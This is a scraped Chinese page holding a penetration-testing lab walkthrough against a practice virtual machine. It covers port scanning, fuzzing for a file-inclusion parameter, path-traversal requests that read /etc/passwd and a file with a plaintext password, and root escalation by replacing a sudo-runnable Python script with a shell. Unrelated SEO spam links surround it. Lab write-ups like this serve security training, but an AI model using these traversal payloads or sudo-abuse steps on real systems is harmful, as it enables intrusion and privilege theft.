当前位置: 首页 > news >正文

从化做网站建设阿里 云网站

从化做网站建设,阿里 云网站,房屋和建设工程信息平台,建网站开发kali#xff1a;192.168.111.111 靶机#xff1a;192.168.111.183 信息收集 端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.183 查看login的源码发现提示#xff1a;page和文件/var/carls.txt 漏洞利用 wfuzz探测account.php页面发现文件包含192.168.111.111 靶机192.168.111.183 信息收集 端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.183 查看login的源码发现提示page和文件/var/carls.txt 漏洞利用 wfuzz探测account.php页面发现文件包含参数为page wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 0 http://192.168.111.183/login/account.php?FUZZ../../../../../../../../../../../../../../etc/passwd 包含/var/carls.txt发现carls用户账号密码carls|carlos http://192.168.111.183/login/account.php?page../../../../../../../../../var/carls.txt 提权 查看carls用户sudo权限 切换到c0ldd用户后查看sudo权限 sudo -u c0ldd /bin/bash 删除/home/c0ldd/目录下的DoNotRun.py再创建一个同名的python脚本写入提权命令 rm -rf DoNotRun.py echo import os DoNotRun.py echo os.system(/bin/bash) DoNotRun.py sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py
http://wiki.neutronadmin.com/news/60942/

相关文章:

  • 建站公司论坛厦门网络公司的网络平台
  • 符合网络营销的网站wordpress 安全性设置
  • 江门整站优化微信公众管理平台
  • 网站中点击链接怎么做的彭州建设网站
  • 自己网站建设装修设计公司哪家
  • 网站备案核验单怎么选建设网站总结
  • 网站付费推广php网站开发笔试题
  • 潮州seo网站推广如何申请网页域名
  • 大连中山网站建设新网站制作公司
  • 做平面计设和网站哪个好网络游戏下载
  • 网站前台建设需要哪些技术知识沈阳做微网站
  • 做python题目的网站企业报刊网站建设情况总结
  • 邢台做网站可信赖建行企业网站
  • 做网站的热门行业农村未来10大暴利行业
  • 源码站用dz wordpress昆山网站维护
  • 有哪些做海报好的网站免费查企业法人
  • 网站建设公司shundeit最近比较火的关键词
  • 杭州好的做网站公司微慕wordpress
  • 行业网站程序seo网站做推广
  • 网站不备案可以用吗微信网站建设流程图
  • 网站页脚包括什么wordpress程序结构
  • 网站建设与推广策划案案例xampp wordpress 花生壳
  • 个人网页网站建设wordpress仅显示标题
  • 悟空建站seo服务网站从建设到赚钱的流程
  • 网站模板用什么打开旅游网站系统源码
  • 网站建设公司口碑排名关键词是什么意思
  • 专业建站推广服务网站建设的平台
  • 做网站用广告赚钱过时了互联网工程师
  • 国外做旅游攻略的网站wordpress 调用 编辑器
  • 焦作北京网站建设旅游网站的功能设计